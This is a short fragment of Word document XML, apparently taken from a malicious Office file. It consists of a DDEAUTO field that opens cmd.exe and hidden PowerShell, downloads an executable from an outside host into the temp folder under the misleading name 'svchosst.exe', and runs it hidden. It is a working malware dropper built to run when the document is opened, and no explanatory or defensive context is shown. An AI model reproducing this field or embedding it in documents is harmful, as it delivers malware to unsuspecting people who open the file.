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fldSimple w:instr=" DDEAUTO c:\\windows\\system32\\cmd.exe &quot;/k powershell -NoP -Sta -NonI -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://aa.osxsm7.ceye.io',' %tmp%\svchosst.exe');Start-Process -WindowStyle Hidden '%tmp%\svchosst.exe'&quot; "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